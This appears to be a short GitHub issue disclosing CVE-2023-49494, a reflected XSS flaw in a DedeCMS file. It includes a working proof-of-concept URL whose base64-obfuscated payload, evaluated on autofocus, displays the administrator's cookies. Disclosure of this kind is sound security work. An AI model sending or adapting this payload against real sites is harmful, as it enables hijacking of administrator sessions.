Hebing123
commented
8 months ago This is the vulnerability exploitation reference for CVE-2023-49494.
Open Hebing123 opened 10 months ago
Hebing123
commented
8 months ago This is the vulnerability exploitation reference for CVE-2023-49494.
Description DedeCMS-V5.7.111 has Reflective XSS vulnerability in filename parameter of select_media_post_wangEditor.php
Proof of Concept
http://192.168.160.132:1434/uploads/include/dialog/select_media_post_wangEditor.php?filename=1%3Cinput%20onfocus=eval(atob(this.id))%20id=YWxlcnQoZG9jdW1lbnQuY29va2llKTs=%20autofocus%3E
Impact Reflective XSS vulnerability triggered by administrator accessing the link.